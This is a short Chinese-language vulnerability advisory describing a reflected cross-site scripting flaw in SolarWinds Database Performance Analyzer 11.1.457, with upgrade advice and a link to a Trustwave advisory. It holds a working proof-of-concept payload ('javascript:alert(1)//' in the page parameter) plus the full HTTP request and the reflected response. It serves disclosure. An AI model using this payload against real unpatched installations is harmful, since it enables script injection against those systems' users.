在SolarWinds的11.1.457版中,“idcStateError.iwc”错误页面中存在Reflected Cross-Site Scripting漏洞,已经在版本12.1中修复。低于11.1.457的版本还可能存在这个漏洞,
以下HTTP请求和响应显示了如何触发问题以及结果:
http://192.168.1.101:8123/iwc/idcStateError.iwc?page=javascript%3aalert(1)%2f%2f
请求:
GET /iwc/idcStateError.iwc?page=javascript%3aalert(1)%2f%2f HTTP/1.1Host: 172.16.4.104:8123Accept-Encoding: gzip, deflateAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0Connection: closeCache-Control: max-age=0Referer: http://172.16.4.104:8123/iwc/login.iwcCookie: JSESSIONID=112A2A7B2EA72FA03B4157A557CE93D9回显:
HTTP/1.1 200 OKServer: Apache-Coyote/1.1Pragma: no-cacheCache-Control: no-storeExpires: Thu, 01 Jan 1970 00:00:00 GMTContent-Type: text/html;charset=UTF-8Content-Language: en-USVary: Accept-EncodingDate: Mon, 19 Nov 2018 18:46:00 GMTConnection: closeContent-Length: 6531[...]<a href="javascript:alert(1)//" class="btn btn-primary">[...]
图1:跨站点脚本(XSS)导致的弹框
SolarWinds数据库性能分析器的用户应升级到12.1版可修复此问题。
有关详细信息,请参阅公告:
https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23916
